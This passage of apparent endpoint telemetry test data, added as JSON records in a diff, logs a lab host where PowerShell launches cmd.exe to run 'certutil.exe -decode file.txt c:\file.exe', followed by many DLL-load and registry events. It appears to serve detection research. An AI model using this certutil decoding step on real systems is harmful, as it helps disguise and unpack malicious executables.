"image_load", + "image_name": "msctf.dll", + "image_path": "C:\\Windows\\System32\\msctf.dll", + "pid": 904, + "process_name": "certutil.exe", + "process_path": "C:\\Windows\\System32\\certutil.exe", + "timestamp": 131883573499950016, + "unique_pid": "{42FC7E13-CBE5-5C05-0000-00108D9C5501}" + }, + { + "event_type": "process", + "pid": 204, + "process_name": "cmd.exe", + "process_path": "C:\\Windows\\System32\\cmd.exe", + "subtype": "terminate", + "timestamp": 131883573500110000, + "unique_pid": "{42FC7E13-CBE5-5C05-0000-0010979B5501}" + }, + { + "event_type": "file", + "file_name": "CERTUTIL.EXE-CB7805D7.pf", + "file_path": "C:\\Windows\\Prefetch\\CERTUTIL.EXE-CB7805D7.pf", + "pid": 1692, + "process_name": "svchost.exe", + "process_path": "c:\\windows\\system32\\svchost.exe", + "timestamp": 131883573500270000, + "unique_pid": "{42FC7E13-B2A2-5C05-0000-00102F790100}" + }, + { + "command_line": "\"C:\\WINDOWS\\system32\\cmd.exe\" /c \"certutil.exe -decode file.txt c:\\file.exe\"", + "event_type": "process", + "logon_id": 217055, + "parent_process_name": "powershell.exe", + "parent_process_path": "C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe", + "pid": 4760, + "ppid": 7036, + "process_name": "cmd.exe", + "process_path": "C:\\Windows\\System32\\cmd.exe", + "subtype": "create", + "timestamp": 131883573500330016, + "unique_pid": "{42FC7E13-CBE6-5C05-0000-00106CAC5501}", + "unique_ppid": "{42FC7E13-C11D-5C05-0000-0010C6E90401}", + "user": "ART-DESKTOP\\bob", + "user_domain": "ART-DESKTOP", + "user_name": "bob" + }, + { + "event_type": "image_load", + "image_name": "cmd.exe", + "image_path": "C:\\Windows\\System32\\cmd.exe", + "pid": 4760, + "process_name": "cmd.exe", + "process_path": "C:\\Windows\\System32\\cmd.exe", + "timestamp": 131883573500270000, + "unique_pid": "{42FC7E13-CBE6-5C05-0000-00106CAC5501}" + }, + { + "event_type": "image_load", + "image_name": "ntdll.dll", + "image_path": "C:\\Windows\\System32\\ntdll.dll", + "pid": 4760, + 
"process_name": "cmd.exe", + "process_path": "C:\\Windows\\System32\\cmd.exe", + "timestamp": 131883573500270000, + "unique_pid": "{42FC7E13-CBE6-5C05-0000-00106CAC5501}" + }, + { + "event_type": "image_load", + "image_name": "kernel32.dll", + "image_path": "C:\\Windows\\System32\\kernel32.dll", + "pid": 4760, + "process_name": "cmd.exe", + "process_path": "C:\\Windows\\System32\\cmd.exe", + "timestamp": 131883573500270000, + "unique_pid": "{42FC7E13-CBE6-5C05-0000-00106CAC5501}" + }, + { + "event_type": "image_load", + "image_name": "KernelBase.dll", + "image_path": "C:\\Windows\\System32\\KernelBase.dll", + "pid": 4760, + "process_name": "cmd.exe", + "process_path": "C:\\Windows\\System32\\cmd.exe", + "timestamp": 131883573500270000, + "unique_pid": "{42FC7E13-CBE6-5C05-0000-00106CAC5501}" + }, + { + "event_type": "image_load", + "image_name": "msvcrt.dll", + "image_path": "C:\\Windows\\System32\\msvcrt.dll", + "pid": 4760, + "process_name": "cmd.exe", + "process_path": "C:\\Windows\\System32\\cmd.exe", + "timestamp": 131883573500270000, + "unique_pid": "{42FC7E13-CBE6-5C05-0000-00106CAC5501}" + }, + { + "command_line": "certutil.exe -decode file.txt c:\\file.exe", + "event_type": "process", + "logon_id": 217055, + "parent_process_name": "cmd.exe", + "parent_process_path": "C:\\Windows\\System32\\cmd.exe", + "pid": 1688, + "ppid": 4760, + "process_name": "certutil.exe", + "process_path": "C:\\Windows\\System32\\certutil.exe", + "subtype": "create", + "timestamp": 131883573500410000, + "unique_pid": "{42FC7E13-CBE6-5C05-0000-001062AD5501}", + "unique_ppid": "{42FC7E13-CBE6-5C05-0000-00106CAC5501}", + "user": "ART-DESKTOP\\bob", + "user_domain": "ART-DESKTOP", + "user_name": "bob" + }, + { + "event_type": "image_load", + "image_name": "certutil.exe", + "image_path": "C:\\Windows\\System32\\certutil.exe", + "pid": 1688, + "process_name": "certutil.exe", + "process_path": "C:\\Windows\\System32\\certutil.exe", + "timestamp": 131883573500420000, + "unique_pid": 
"{42FC7E13-CBE6-5C05-0000-001062AD5501}" + }, + { + "event_type": "image_load", + "image_name": "ntdll.dll", + "image_path": "C:\\Windows\\System32\\ntdll.dll", + "pid": 1688, + "process_name": "certutil.exe", + "process_path": "C:\\Windows\\System32\\certutil.exe", + "timestamp": 131883573500420000, + "unique_pid": "{42FC7E13-CBE6-5C05-0000-001062AD5501}" + }, + { + "event_type": "image_load", + "image_name": "kernel32.dll", + "image_path": "C:\\Windows\\System32\\kernel32.dll", + "pid": 1688, + "process_name": "certutil.exe", + "process_path": "C:\\Windows\\System32\\certutil.exe", + "timestamp": 131883573500420000, + "unique_pid": "{42FC7E13-CBE6-5C05-0000-001062AD5501}" + }, + { + "event_type": "image_load", + "image_name": "KernelBase.dll", + "image_path": "C:\\Windows\\System32\\KernelBase.dll", + "pid": 1688, + "process_name": "certutil.exe", + "process_path": "C:\\Windows\\System32\\certutil.exe", + "timestamp": 131883573500420000, + "unique_pid": "{42FC7E13-CBE6-5C05-0000-001062AD5501}" + }, + { + "event_type": "image_load", + "image_name": "advapi32.dll", + "image_path": "C:\\Windows\\System32\\advapi32.dll", + "pid": 1688, + "process_name": "certutil.exe", + "process_path": "C:\\Windows\\System32\\certutil.exe", + "timestamp": 131883573500420000, + "unique_pid": "{42FC7E13-CBE6-5C05-0000-001062AD5501}" + }, + { + "event_type": "image_load", + "image_name": "msvcrt.dll", + "image_path": "C:\\Windows\\System32\\msvcrt.dll", + "pid": 1688, + "process_name": "certutil.exe", + "process_path": "C:\\Windows\\System32\\certutil.exe", + "timestamp": 131883573500420000, + "unique_pid": "{42FC7E13-CBE6-5C05-0000-001062AD5501}" + }, + { + "event_type": "image_load", + "image_name": "sechost.dll", + "image_path": "C:\\Windows\\System32\\sechost.dll", + "pid": 1688, + "process_name": "certutil.exe", + "process_path": "C:\\Windows\\System32\\certutil.exe", + "timestamp": 131883573500420000, + "unique_pid": "{42FC7E13-CBE6-5C05-0000-001062AD5501}" + }, + { + 
"event_type": "image_load", + "image_name": "rpcrt4.dll", + "image_path": "C:\\Windows\\System32\\rpcrt4.dll", + "pid": 1688, + "process_name": "certutil.exe", + "process_path": "C:\\Windows\\System32\\certutil.exe", + "timestamp": 131883573500420000, + "unique_pid": "{42FC7E13-CBE6-5C05-0000-001062AD5501}" + }, + { + "event_type": "image_load", + "image_name": "certcli.dll", + "image_path": "C:\\Windows\\System32\\certcli.dll", + "pid": 1688, + "process_name": "certutil.exe", + "process_path": "C:\\Windows\\System32\\certutil.exe", + "timestamp": 131883573500580000, + "unique_pid": "{42FC7E13-CBE6-5C05-0000-001062AD5501}" + }, + { + "event_type": "image_load", + "image_name": "crypt32.dll", + "image_path": "C:\\Windows\\System32\\crypt32.dll", + "pid": 1688, + "process_name": "certutil.exe", + "process_path": "C:\\Windows\\System32\\certutil.exe", + "timestamp": 131883573500740000, + "unique_pid": "{42FC7E13-CBE6-5C05-0000-001062AD5501}" + }, + { + "event_type": "image_load", + "image_name": "ucrtbase.dll", + "image_path": "C:\\Windows\\System32\\ucrtbase.dll", + "pid": 1688, + "process_name": "certutil.exe", + "process_path": "C:\\Windows\\System32\\certutil.exe", + "timestamp": 131883573500740000, + "unique_pid": "{42FC7E13-CBE6-5C05-0000-001062AD5501}" + }, + { + "event_type": "image_load", + "image_name": "crypt32.dll", + "image_path": "C:\\Windows\\System32\\crypt32.dll", + "pid": 1688, + "process_name": "certutil.exe", + "process_path": "C:\\Windows\\System32\\certutil.exe", + "timestamp": 131883573500740000, + "unique_pid": "{42FC7E13-CBE6-5C05-0000-001062AD5501}" + }, + { + "event_type": "image_load", + "image_name": "Wldap32.dll", + "image_path": "C:\\Windows\\System32\\Wldap32.dll", + "pid": 1688, + "process_name": "certutil.exe", + "process_path": "C:\\Windows\\System32\\certutil.exe", + "timestamp": 131883573500740000, + "unique_pid": "{42FC7E13-CBE6-5C05-0000-001062AD5501}" + }, + { + "event_type": "image_load", + "image_name": "msasn1.dll", + 
"image_path": "C:\\Windows\\System32\\msasn1.dll", + "pid": 1688, + "process_name": "certutil.exe", + "process_path": "C:\\Windows\\System32\\certutil.exe", + "timestamp": 131883573500740000, + "unique_pid": "{42FC7E13-CBE6-5C05-0000-001062AD5501}" + }, + { + "event_type": "image_load", + "image_name": "certca.dll", + "image_path": "C:\\Windows\\System32\\certca.dll", + "pid": 1688, + "process_name": "certutil.exe", + "process_path": "C:\\Windows\\System32\\certutil.exe", + "timestamp": 131883573500740000, + "unique_pid": "{42FC7E13-CBE6-5C05-0000-001062AD5501}" + }, + { + "event_type": "image_load", + "image_name": "cryptsp.dll", + "image_path": "C:\\Windows\\System32\\cryptsp.dll", + "pid": 1688, + "process_name": "certutil.exe", + "process_path": "C:\\Windows\\System32\\certutil.exe", + "timestamp": 131883573500740000, + "unique_pid": "{42FC7E13-CBE6-5C05-0000-001062AD5501}" + }, + { + "event_type": "image_load", + "image_name": "gdi32.dll", + "image_path": "C:\\Windows\\System32\\gdi32.dll", + "pid": 1688, + "process_name": "certutil.exe", + "process_path": "C:\\Windows\\System32\\certutil.exe", + "timestamp": 131883573500740000, + "unique_pid": "{42FC7E13-CBE6-5C05-0000-001062AD5501}" + }, + { + "event_type": "image_load", + "image_name": "cabinet.dll", + "image_path": "C:\\Windows\\System32\\cabinet.dll", + "pid": 1688, + "process_name": "certutil.exe", + "process_path": "C:\\Windows\\System32\\certutil.exe", + "timestamp": 131883573500740000, + "unique_pid": "{42FC7E13-CBE6-5C05-0000-001062AD5501}" + }, + { + "event_type": "image_load", + "image_name": "cryptui.dll", + "image_path": "C:\\Windows\\System32\\cryptui.dll", + "pid": 1688, + "process_name": "certutil.exe", + "process_path": "C:\\Windows\\System32\\certutil.exe", + "timestamp": 131883573500740000, + "unique_pid": "{42FC7E13-CBE6-5C05-0000-001062AD5501}" + }, + { + "event_type": "image_load", + "image_name": "gdi32.dll", + "image_path": "C:\\Windows\\System32\\gdi32.dll", + "pid": 1688, + 
"process_name": "certutil.exe", + "process_path": "C:\\Windows\\System32\\certutil.exe", + "timestamp": 131883573500740000, + "unique_pid": "{42FC7E13-CBE6-5C05-0000-001062AD5501}" + }, + { + "event_type": "image_load", + "image_name": "gdi32full.dll", + "image_path": "C:\\Windows\\System32\\gdi32full.dll", + "pid": 1688, + "process_name": "certutil.exe", + "process_path": "C:\\Windows\\System32\\certutil.exe", + "timestamp": 131883573500740000, + "unique_pid": "{42FC7E13-CBE6-5C05-0000-001062AD5501}" + }, + { + "event_type": "image_load", + "image_name": "msvcp_win.dll", + "image_path": "C:\\Windows\\System32\\msvcp_win.dll", + "pid": 1688, + "process_name": "certutil.exe", + "process_path": "C:\\Windows\\System32\\certutil.exe", + "timestamp": 131883573500740000, + "unique_pid": "{42FC7E13-CBE6-5C05-0000-001062AD5501}" + }, + { + "event_type": "image_load", + "image_name": "user32.dll", + "image_path": "C:\\Windows\\System32\\user32.dll", + "pid": 1688, + "process_name": "certutil.exe", + "process_path": "C:\\Windows\\System32\\certutil.exe", + "timestamp": 131883573500740000, + "unique_pid": "{42FC7E13-CBE6-5C05-0000-001062AD5501}" + }, + { + "event_type": "image_load", + "image_name": "win32u.dll", + "image_path": "C:\\Windows\\System32\\win32u.dll", + "pid": 1688, + "process_name": "certutil.exe", + "process_path": "C:\\Windows\\System32\\certutil.exe", + "timestamp": 131883573500740000, + "unique_pid": "{42FC7E13-CBE6-5C05-0000-001062AD5501}" + }, + { + "event_type": "image_load", + "image_name": "bcrypt.dll", + "image_path": "C:\\Windows\\System32\\bcrypt.dll", + "pid": 1688, + "process_name": "certutil.exe", + "process_path": "C:\\Windows\\System32\\certutil.exe", + "timestamp": 131883573500740000, + "unique_pid": "{42FC7E13-CBE6-5C05-0000-001062AD5501}" + }, + { + "event_type": "image_load", + "image_name": "comctl32.dll", + "image_path": 
"C:\\Windows\\WinSxS\\amd64_microsoft.windows.common-controls_6595b64144ccf1df_5.82.17134.441_none_f952a0bb30955e96\\comctl32.dll", + "pid": 1688, + "process_name": "certutil.exe", + "process_path": "C:\\Windows\\System32\\certutil.exe", + "timestamp": 131883573500740000, + "unique_pid": "{42FC7E13-CBE6-5C05-0000-001062AD5501}" + }, + { + "event_type": "image_load", + "image_name": "ncrypt.dll", + "image_path": "C:\\Windows\\System32\\ncrypt.dll", + "pid": 1688, + "process_name": "certutil.exe", + "process_path": "C:\\Windows\\System32\\certutil.exe", + "timestamp": 131883573500740000, + "unique_pid": "{42FC7E13-CBE6-5C05-0000-001062AD5501}" + }, + { + "event_type": "image_load", + "image_name": "ntasn1.dll", + "image_path": "C:\\Windows\\System32\\ntasn1.dll", + "pid": 1688, + "process_name": "certutil.exe", + "process_path": "C:\\Windows\\System32\\certutil.exe", + "timestamp": 131883573500740000, + "unique_pid": "{42FC7E13-CBE6-5C05-0000-001062AD5501}" + }, + { + "event_type": "image_load", + "image_name": "netapi32.dll", + "image_path": "C:\\Windows\\System32\\netapi32.dll", + "pid": 1688, + "process_name": "certutil.exe", + "process_path": "C:\\Windows\\System32\\certutil.exe", + "timestamp": 131883573500740000, + "unique_pid": "{42FC7E13-CBE6-5C05-0000-001062AD5501}" + }, + { + "event_type": "image_load", + "image_name": "normaliz.dll", + "image_path": "C:\\Windows\\System32\\normaliz.dll", + "pid": 1688, + "process_name": "certutil.exe", + "process_path": "C:\\Windows\\System32\\certutil.exe", + "timestamp": 131883573500740000, + "unique_pid": "{42FC7E13-CBE6-5C05-0000-001062AD5501}" + }, + { + "event_type": "image_load", + "image_name": "ntdsapi.dll", + "image_path": "C:\\Windows\\System32\\ntdsapi.dll", + "pid": 1688, + "process_name": "certutil.exe", + "process_path": "C:\\Windows\\System32\\certutil.exe", + "timestamp": 131883573500740000, + "unique_pid": "{42FC7E13-CBE6-5C05-0000-001062AD5501}" + }, + { + "event_type": "image_load", + "image_name": 
"ws2_32.dll", + "image_path": "C:\\Windows\\System32\\ws2_32.dll", + "pid": 1688, + "process_name": "certutil.exe", + "process_path": "C:\\Windows\\System32\\certutil.exe", + "timestamp": 131883573500740000, + "unique_pid": "{42FC7E13-CBE6-5C05-0000-001062AD5501}" + }, + { + "event_type": "image_load", + "image_name": "setupapi.dll", + "image_path": "C:\\Windows\\System32\\setupapi.dll", + "pid": 1688, + "process_name": "certutil.exe", + "process_path": "C:\\Windows\\System32\\certutil.exe", + "timestamp": 131883573500740000, + "unique_pid": "{42FC7E13-CBE6-5C05-0000-001062AD5501}" + }, + { + "event_type": "image_load", + "image_name": "cfgmgr32.dll", + "image_path": "C:\\Windows\\System32\\cfgmgr32.dll", + "pid": 1688, + "process_name": "certutil.exe", + "process_path": "C:\\Windows\\System32\\certutil.exe", + "timestamp": 131883573500890000, + "unique_pid": "{42FC7E13-CBE6-5C05-0000-001062AD5501}" + }, + { + "event_type": "image_load", + "image_name": "shell32.dll", + "image_path": "C:\\Windows\\System32\\shell32.dll", + "pid": 1688, + "process_name": "certutil.exe", + "process_path": "C:\\Windows\\System32\\certutil.exe", + "timestamp": 131883573500890000, + "unique_pid": "{42FC7E13-CBE6-5C05-0000-001062AD5501}" + }, + { + "event_type": "image_load", + "image_name": "SHCore.dll", + "image_path": "C:\\Windows\\System32\\SHCore.dll", + "pid": 1688, + "process_name": "certutil.exe", + "process_path": "C:\\Windows\\System32\\certutil.exe", + "timestamp": 131883573500890000, + "unique_pid": "{42FC7E13-CBE6-5C05-0000-001062AD5501}" + }, + { + "event_type": "image_load", + "image_name": "combase.dll", + "image_path": "C:\\Windows\\System32\\combase.dll", + "pid": 1688, + "process_name": "certutil.exe", + "process_path": "C:\\Windows\\System32\\certutil.exe", + "timestamp": 131883573500890000, + "unique_pid": "{42FC7E13-CBE6-5C05-0000-001062AD5501}" + }, + { + "event_type": "image_load", + "image_name": "bcryptprimitives.dll", + "image_path": 
"C:\\Windows\\System32\\bcryptprimitives.dll", + "pid": 1688, + "process_name": "certutil.exe", + "process_path": "C:\\Windows\\System32\\certutil.exe", + "timestamp": 131883573500890000, + "unique_pid": "{42FC7E13-CBE6-5C05-0000-001062AD5501}" + }, + { + "event_type": "image_load", + "image_name": "windows.storage.dll", + "image_path": "C:\\Windows\\System32\\windows.storage.dll", + "pid": 1688, + "process_name": "certutil.exe", + "process_path": "C:\\Windows\\System32\\certutil.exe", + "timestamp": 131883573500890000, + "unique_pid": "{42FC7E13-CBE6-5C05-0000-001062AD5501}" + }, + { + "event_type": "image_load", + "image_name": "shlwapi.dll", + "image_path": "C:\\Windows\\System32\\shlwapi.dll", + "pid": 1688, + "process_name": "certutil.exe", + "process_path": "C:\\Windows\\System32\\certutil.exe", + "timestamp": 131883573500890000, + "unique_pid": "{42FC7E13-CBE6-5C05-0000-001062AD5501}" + }, + { + "event_type": "image_load", + "image_name": "kernel.appcore.dll", + "image_path": "C:\\Windows\\System32\\kernel.appcore.dll", + "pid": 1688, + "process_name": "certutil.exe", + "process_path": "C:\\Windows\\System32\\certutil.exe", + "timestamp": 131883573500890000, + "unique_pid": "{42FC7E13-CBE6-5C05-0000-001062AD5501}" + }, + { + "event_type": "image_load", + "image_name": "profapi.dll", + "image_path": "C:\\Windows\\System32\\profapi.dll", + "pid": 1688, + "process_name": "certutil.exe", + "process_path": "C:\\Windows\\System32\\certutil.exe", + "timestamp": 131883573500890000, + "unique_pid": "{42FC7E13-CBE6-5C05-0000-001062AD5501}" + }, + { + "event_type": "image_load", + "image_name": "powrprof.dll", + "image_path": "C:\\Windows\\System32\\powrprof.dll", + "pid": 1688, + "process_name": "certutil.exe", + "process_path": "C:\\Windows\\System32\\certutil.exe", + "timestamp": 131883573500890000, + "unique_pid": "{42FC7E13-CBE6-5C05-0000-001062AD5501}" + }, + { + "event_type": "image_load", + "image_name": "fltLib.dll", + "image_path": 
"C:\\Windows\\System32\\fltLib.dll", + "pid": 1688, + "process_name": "certutil.exe", + "process_path": "C:\\Windows\\System32\\certutil.exe", + "timestamp": 131883573500890000, + "unique_pid": "{42FC7E13-CBE6-5C05-0000-001062AD5501}" + }, + { + "event_type": "image_load", + "image_name": "ole32.dll", + "image_path": "C:\\Windows\\System32\\ole32.dll", + "pid": 1688, + "process_name": "certutil.exe", + "process_path": "C:\\Windows\\System32\\certutil.exe", + "timestamp": 131883573500890000, + "unique_pid": "{42FC7E13-CBE6-5C05-0000-001062AD5501}" + }, + { + "event_type": "image_load", + "image_name": "oleaut32.dll", + "image_path": "C:\\Windows\\System32\\oleaut32.dll", + "pid": 1688, + "process_name": "certutil.exe", + "process_path": "C:\\Windows\\System32\\certutil.exe", + "timestamp": 131883573500890000, + "unique_pid": "{42FC7E13-CBE6-5C05-0000-001062AD5501}" + }, + { + "event_type": "image_load", + "image_name": "version.dll", + "image_path": "C:\\Windows\\System32\\version.dll", + "pid": 1688, + "process_name": "certutil.exe", + "process_path": "C:\\Windows\\System32\\certutil.exe", + "timestamp": 131883573500890000, + "unique_pid": "{42FC7E13-CBE6-5C05-0000-001062AD5501}" + }, + { + "event_type": "image_load", + "image_name": "secur32.dll", + "image_path": "C:\\Windows\\System32\\secur32.dll", + "pid": 1688, + "process_name": "certutil.exe", + "process_path": "C:\\Windows\\System32\\certutil.exe", + "timestamp": 131883573500890000, + "unique_pid": "{42FC7E13-CBE6-5C05-0000-001062AD5501}" + }, + { + "event_type": "image_load", + "image_name": "samcli.dll", + "image_path": "C:\\Windows\\System32\\samcli.dll", + "pid": 1688, + "process_name": "certutil.exe", + "process_path": "C:\\Windows\\System32\\certutil.exe", + "timestamp": 131883573500890000, + "unique_pid": "{42FC7E13-CBE6-5C05-0000-001062AD5501}" + }, + { + "event_type": "image_load", + "image_name": "dsrole.dll", + "image_path": "C:\\Windows\\System32\\dsrole.dll", + "pid": 1688, + "process_name": 
"certutil.exe", + "process_path": "C:\\Windows\\System32\\certutil.exe", + "timestamp": 131883573500890000, + "unique_pid": "{42FC7E13-CBE6-5C05-0000-001062AD5501}" + }, + { + "event_type": "image_load", + "image_name": "netutils.dll", + "image_path": "C:\\Windows\\System32\\netutils.dll", + "pid": 1688, + "process_name": "certutil.exe", + "process_path": "C:\\Windows\\System32\\certutil.exe", + "timestamp": 131883573500890000, + "unique_pid": "{42FC7E13-CBE6-5C05-0000-001062AD5501}" + }, + { + "event_type": "image_load", + "image_name": "logoncli.dll", + "image_path": "C:\\Windows\\System32\\logoncli.dll", + "pid": 1688, + "process_name": "certutil.exe", + "process_path": "C:\\Windows\\System32\\certutil.exe", + "timestamp": 131883573500890000, + "unique_pid": "{42FC7E13-CBE6-5C05-0000-001062AD5501}" + }, + { + "event_type": "image_load", + "image_name": "sspicli.dll", + "image_path": "C:\\Windows\\System32\\sspicli.dll", + "pid": 1688, + "process_name": "certutil.exe", + "process_path": "C:\\Windows\\System32\\certutil.exe", + "timestamp": 131883573500890000, + "unique_pid": "{42FC7E13-CBE6-5C05-0000-001062AD5501}" + }, + { + "event_type": "image_load", + "image_name": "imm32.dll", + "image_path": "C:\\Windows\\System32\\imm32.dll", + "pid": 1688, + "process_name": "certutil.exe", + "process_path": "C:\\Windows\\System32\\certutil.exe", + "timestamp": 131883573500890000, + "unique_pid": "{42FC7E13-CBE6-5C05-0000-001062AD5501}" + }, + { + "event_type": "image_load", + "image_name": "uxtheme.dll", + "image_path": "C:\\Windows\\System32\\uxtheme.dll", + "pid": 1688, + "process_name": "certutil.exe", + "process_path": "C:\\Windows\\System32\\certutil.exe", + "timestamp": 131883573500890000, + "unique_pid": "{42FC7E13-CBE6-5C05-0000-001062AD5501}" + }, + { + "event_type": "image_load", + "image_name": "msctf.dll", + "image_path": "C:\\Windows\\System32\\msctf.dll", + "pid": 1688, + "process_name": "certutil.exe", + "process_path": 
"C:\\Windows\\System32\\certutil.exe", + "timestamp": 131883573500890000, + "unique_pid": "{42FC7E13-CBE6-5C05-0000-001062AD5501}" + }, + { + "event_type": "image_load", + "image_name": "dwmapi.dll", + "image_path": "C:\\Windows\\System32\\dwmapi.dll", + "pid": 1688, + "process_name": "certutil.exe", + "process_path": "C:\\Windows\\System32\\certutil.exe", + "timestamp": 131883573501040000, + "unique_pid": "{42FC7E13-CBE6-5C05-0000-001062AD5501}" + }, + { + "event_type": "registry", + "pid": 1688, + "process_name": "certutil.exe", + "process_path": "C:\\WINDOWS\\system32\\certutil.exe", + "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E", + "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E\\LanguageList", + "registry_value": "LanguageList", + "timestamp": 131883573501040000, + "unique_pid": "{42FC7E13-CBE6-5C05-0000-001062AD5501}" + }, + { + "event_type": "registry", + "pid": 1688, + "process_name": "certutil.exe", + "process_path": "C:\\WINDOWS\\system32\\certutil.exe", + "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E", + "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E\\LanguageList", + "registry_value": "LanguageList", + "timestamp": 131883573501040000, + "unique_pid": "{42FC7E13-CBE6-5C05-0000-001062AD5501}" + }, + { + "event_type": "registry", + "pid": 1688, + "process_name": "certutil.exe", + "process_path": "C:\\WINDOWS\\system32\\certutil.exe", + "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E", + "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E\\LanguageList", + "registry_value": "LanguageList", + "timestamp": 131883573501040000, + "unique_pid": 
"{42FC7E13-CBE6-5C05-0000-001062AD5501}" + }, + { + "event_type": "registry", + "pid": 1688, + "process_name": "certutil.exe", + "process_path": "C:\\WINDOWS\\system32\\certutil.exe", + "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E", + "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E\\LanguageList", + "registry_value": "LanguageList", + "timestamp": 131883573501040000, + "unique_pid": "{42FC7E13-CBE6-5C05-0000-001062AD5501}" + }, + { + "event_type": "registry", + "pid": 1688, + "process_name": "certutil.exe", + "process_path": "C:\\WINDOWS\\system32\\certutil.exe", + "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E", + "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E\\LanguageList", + "registry_value": "LanguageList", + "timestamp": 131883573501040000, + "unique_pid": "{42FC7E13-CBE6-5C05-0000-001062AD5501}" + }, + { + "event_type": "registry", + "pid": 1688, + "process_name": "certutil.exe", + "process_path": "C:\\WINDOWS\\system32\\certutil.exe", + "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E", + "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E\\LanguageList", + "registry_value": "LanguageList", + "timestamp": 131883573501040000, + "unique_pid": "{42FC7E13-CBE6-5C05-0000-001062AD5501}" + }, + { + "event_type": "registry", + "pid": 1688, + "process_name": "certutil.exe", + "process_path": "C:\\WINDOWS\\system32\\certutil.exe", + "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E", + "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local 
Settings\\MuiCache\\1\\52C64B7E\\LanguageList", + "registry_value": "LanguageList", + "timestamp": 131883573501040000, + "unique_pid": "{42FC7E13-CBE6-5C05-0000-001062AD5501}" + }, + { + "event_type": "registry", + "pid": 1688, + "process_name": "certutil.exe", + "process_path": "C:\\WINDOWS\\system32\\certutil.exe", + "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E", + "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E\\LanguageList", + "registry_value": "LanguageList", + "timestamp": 131883573501040000, + "unique_pid": "{42FC7E13-CBE6-5C05-0000-001062AD5501}" + }, + { + "event_type": "registry", + "pid": 1688, + "process_name": "certutil.exe", + "process_path": "C:\\WINDOWS\\system32\\certutil.exe", + "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E", + "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E\\LanguageList", + "registry_value": "LanguageList", + "timestamp": 131883573501040000, + "unique_pid": "{42FC7E13-CBE6-5C05-0000-001062AD5501}" + }, + { + "event_type": "registry", + "pid": 1688, + "process_name": "certutil.exe", + "process_path": "C:\\WINDOWS\\system32\\certutil.exe", + "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E", + "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E\\LanguageList", + "registry_value": "LanguageList", + "timestamp": 131883573501040000, + "unique_pid": "{42FC7E13-CBE6-5C05-0000-001062AD5501}" + }, + { + "event_type": "registry", + "pid": 1688, + "process_name": "certutil.exe", + "process_path": "C:\\WINDOWS\\system32\\certutil.exe", + "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local 
Settings\\MuiCache\\1\\52C64B7E", + "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E\\LanguageList", + "registry_value": "LanguageList", + "timestamp": 131883573501040000, + "unique_pid": "{42FC7E13-CBE6-5C05-0000-001062AD5501}" + }, + { + "event_type": "registry", + "pid": 1688, + "process_name": "certutil.exe", + "process_path": "C:\\WINDOWS\\system32\\certutil.exe", + "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E", + "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E\\LanguageList", + "registry_value": "LanguageList", + "timestamp": 131883573501040000, + "unique_pid": "{42FC7E13-CBE6-5C05-0000-001062AD5501}" + }, + { + "event_type": "registry", + "pid": 1688, + "process_name": "certutil.exe", + "process_path": "C:\\WINDOWS\\system32\\certutil.exe", + "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E", + "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E\\LanguageList", + "registry_value": "LanguageList", + "timestamp": 131883573501040000, + "unique_pid": "{42FC7E13-CBE6-5C05-0000-001062AD5501}" + }, + { + "event_type": "registry", + "pid": 1688, + "process_name": "certutil.exe", + "process_path": "C:\\WINDOWS\\system32\\certutil.exe", + "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E", + "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local 